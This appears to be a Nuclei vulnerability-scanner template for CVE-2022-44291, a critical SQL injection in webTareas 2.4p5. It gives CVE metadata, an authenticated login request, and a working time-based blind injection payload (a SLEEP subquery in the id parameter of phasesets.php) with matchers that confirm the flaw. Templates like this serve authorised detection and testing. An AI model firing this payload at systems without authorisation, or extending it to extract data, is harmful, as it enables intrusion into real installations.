id: CVE-2022-44291 info: name: WebTareas 2.4p5 - SQL Injection author: theamanrawat severity: critical description: | webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php. reference: - http://webtareas.com/ - https://github.com/anhdq201/webtareas/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2022-44291 - http://webtareas.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-44291 cwe-id: CWE-89 epss-score: 0.00789 epss-percentile: 0.79492 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: webtareas_project product: webtareas tags: cve,cve2022,sqli,webtareas,authenticated,intrusive http: - raw: - | POST /general/login.php?session=false HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="action" login -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="loginForm" {{username}} -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="passwordForm" {{password}} -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="loginSubmit" Log In -----------------------------3023071625140724693672385525-- - | @timeout: 20s GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers: - type: dsl dsl: - 'duration_2>=6' - 'len(body_2) == 0' - 'status_code_2 == 302' - 'contains(header_2, "text/html")' - 'contains(body_1, "webTareasSID")' condition: and # digest: 4b0a00483046022100c0e8a2e7dfb333d71ff67edff04d2a9fe8f408e510f8a0c55e2220d57f95457f022100f6cbb50cb37ce4cf7ac22779c93f4c502ce810facae5119a0fe5c426e8a89387:922c64590222798bb761d5b6d8e72950